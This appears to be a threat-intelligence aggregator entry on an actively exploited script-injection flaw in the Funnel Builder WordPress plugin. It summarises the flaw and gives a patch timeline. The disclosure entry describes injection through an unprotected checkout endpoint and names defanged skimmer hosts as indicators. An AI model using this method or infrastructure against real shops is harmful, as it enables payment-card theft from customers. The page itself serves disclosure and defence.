Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Funnel Builder WordPress plugin unauthenticated checkout script injection actively exploited security flaw

Vulnerability
First reported
Last updated
Happening score
H score 44
1 unique sources, 1 articles

Summary

Hide ▲

Funnel Builder for WordPress has an actively exploited unauthenticated script-injection flaw that can compromise WooCommerce checkout pages and steal payment data. The issue affects versions before 3.15.0.3 and creates risk for the plugin’s more than 40,000 websites. Attackers can inject malicious JavaScript into the plugin’s External Scripts setting, turning checkout pages into skimming points. The flaw was fixed in 3.15.0.3.

Related Happenings

Funnel Builder plugin WordPress arbitrary JavaScript injection actively exploited security flaw

Vulnerability
First: 16.05.2026 18:20 Last: 16.05.2026 18:20 Sources 1

About this happening: **Funnel Builder** for **WordPress** is under **active exploitation** for arbitrary JavaScript injection into **WooCommerce checkout pages**, creating payment-skimming risk across...

Open Happening

Magento Open Source and Adobe Commerce PolyShell unauthenticated RCE flaw

Vulnerability
First: 19.03.2026 22:01 Last: 19.03.2026 22:01 Sources 1

About this happening: **PolyShell** is a **Magento Open Source** and **Adobe Commerce** vulnerability that can enable **unauthenticated code execution** and **account takeover** across **stable version...

Open Happening

Stripe iframe skimmer campaign targeting merchants

Campaign
First: 24.09.2025 14:03 Last: 24.09.2025 14:03 Sources 1

About this happening: The **Stripe iframe skimmer campaign** used **malicious overlays** to steal card data from **dozens of merchants**, raising checkout-fraud risk across payment pages. In **August 2...

Open Happening

Payment iframe defense against malicious overlays on checkout pages

Defensive Guidance
First: 24.09.2025 14:03 Last: 24.09.2025 14:03 Sources 1

About this happening: Attackers are actively abusing **payment iframes** on **checkout pages** with **malicious overlays**, making **strict CSP** and **real-time monitoring** essential to prevent card...

Open Happening

Timeline

  1. 15.05.2026 22:30 1 articles · 12d ago

    Funnel Builder 3.15.0.3 patch released

    Mitigation Patch Update

    FunnelKit released Funnel Builder version 3.15.0.3 to address the script-injection flaw affecting all versions before 3.15.0.3, providing a fix for the vulnerable WooCommerce checkout customization plugin.

    Show sources
    Open in new tab
  2. 15.05.2026 22:30 2 articles · 12d ago

    Active exploitation of Funnel Builder checkout script injection disclosed

    Initial Disclosure

    Sansec detected active exploitation of a critical unauthenticated Funnel Builder flaw that lets an attacker modify the plugin’s global settings through an unprotected checkout endpoint and inject malicious JavaScript into WooCommerce checkout pages. The payload is disguised as a fake Google Tag Manager/Google Analytics script, loads analytics-reports[.]com/wss/jquery-lib.js, opens a WebSocket connection to wss://protect-wss[.]com/ws, and delivers a customized payment card skimmer that can steal credit card numbers, CVVs, billing addresses, and other customer information from affected checkout flows.

    Show sources
    Open in new tab